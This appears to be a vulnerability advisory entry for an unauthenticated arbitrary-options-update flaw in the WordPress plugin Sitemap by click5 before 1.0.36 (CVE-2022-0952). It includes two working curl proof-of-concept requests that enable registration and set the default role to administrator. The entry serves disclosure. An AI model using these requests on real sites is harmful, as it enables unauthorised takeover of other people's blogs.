Lucene search
CydaveWPEX-ID:0F694961-AFAB-44F9-846C-E80A0F6C768BHistoryApr 11, 2022 - 12:00 a.m.
Sitemap by click5 < 1.0.36 - Unauthenticated Arbitrary Options Update
2022-04-1100:00:00
cydave
138
sitemap by click5
unauthenticated
options update
user registrations
default role
administrator
exploit
curl
EPSS
0.48
Percentile
97.5%
The plugin does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin. As a result, unauthenticated attackers could change arbitrary blog options, such as the users_can_register and default_role, allowing them to create a new admin account and take over the blog.
Allow user registrations:
curl 'https://example.com/?rest_route=/click5_sitemap/API/update_html_option_AJAX' \
-H 'Content-Type: application/json' \
--data '{"users_can_register": 1}'
Set the default user role to administrator:
curl 'https://example.com/?rest_route=/click5_sitemap/API/update_html_option_AJAX' \
-H 'Content-Type: application/json' \
--data '{"default_role":"administrator"}'Related
wpvulndb
wpvulndb
Sitemap by click5 < 1.0.36 - Unauthenticated Arbitrary Options Update
2022-04-11 00:00:00
patchstack
patchstack
prion
prion
Cross site request forgery (csrf)
2022-05-02 16:15:00
nuclei
nuclei
WordPress Sitemap by click5 <1.0.36 - Missing Authorization
2022-04-15 14:45:43
cnvd
cnvd
WordPress Sitemap by click5 plugin存在未明漏洞
2022-05-07 00:00:00
cve
cve
CVE-2022-0952
2022-05-02 16:15:08
githubexploit
githubexploit
Exploit for Cross-Site Request Forgery (CSRF) in Sitemap Project Sitemap
2023-08-07 14:28:11
cvelist
cvelist
nvd
nvd
CVE-2022-0952
2022-05-02 16:15:08